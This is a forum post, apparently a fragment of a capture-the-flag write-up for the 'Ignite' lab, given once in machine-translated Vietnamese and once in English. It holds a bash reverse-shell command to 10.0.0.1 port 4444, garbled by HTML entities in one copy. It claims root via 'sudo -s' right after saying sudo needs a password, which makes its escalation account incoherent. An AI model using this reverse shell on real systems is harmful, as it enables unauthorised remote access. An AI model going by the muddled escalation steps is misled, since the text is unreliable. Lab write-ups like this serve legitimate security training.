Một chút Writeup về thử thách Ignite

TricksMMO

Administrator
Staff member
|/bin/bash -i & gt;/dev/tcp/10.0.0.1/4444 0 & lt;/dev/tcp/10.0.0.1/4444 "Đặc quyền leo thang
Bây giờ chúng tôi có một shell ngược, nhưng chúng tôi vẫn ở trong bối cảnh người dùng. Chúng tôi cần phải leo thang các đặc quyền để có quyền truy cập gốc.
Để làm điều này, chúng ta có thể sử dụng lệnh sau:

sudo -l

Điều này sẽ cho chúng ta thấy các đặc quyền mà người dùng có. Trong trường hợp này, người dùng có các đặc quyền sudo, nhưng nó không phải là không có mật khẩu.

Chúng ta có thể sử dụng lệnh sau để lấy vỏ gốc:

sudo -s

Và bây giờ chúng tôi có quyền truy cập gốc!

Bản tóm tắt
Trong bài viết này, chúng tôi đã học được cách khai thác lỗ hổng RCE trong CMS nhiên liệu để có được một vỏ ngược. Chúng tôi sau đó đã leo thang các đặc quyền để có được quyền truy cập gốc.

#NMAP
#Http
#Scalate đặc quyền
=======================================
| /bin/bash -i > /dev/tcp/10.0.0.1/4444 0 < /dev/tcp/10.0.0.1/4444" Escalate privileges
Now we have a reverse shell, but we are still in the user context.We need to escalate privileges to get root access.
To do this, we can use the following command:

sudo -l

This will show us the privileges that the user has.In this case, the user has sudo privileges, but it is not without a password.

We can use the following command to get a root shell:

sudo -s

And now we have root access!

Summary
In this article, we have learned how to exploit a RCE vulnerability in Fuel CMS to get a reverse shell.We then escalated privileges to get root access.

#NMAP
#Http
#Escalate privileges
 
Join Telegram ToolsKiemTrieuDoGroup
Back
Top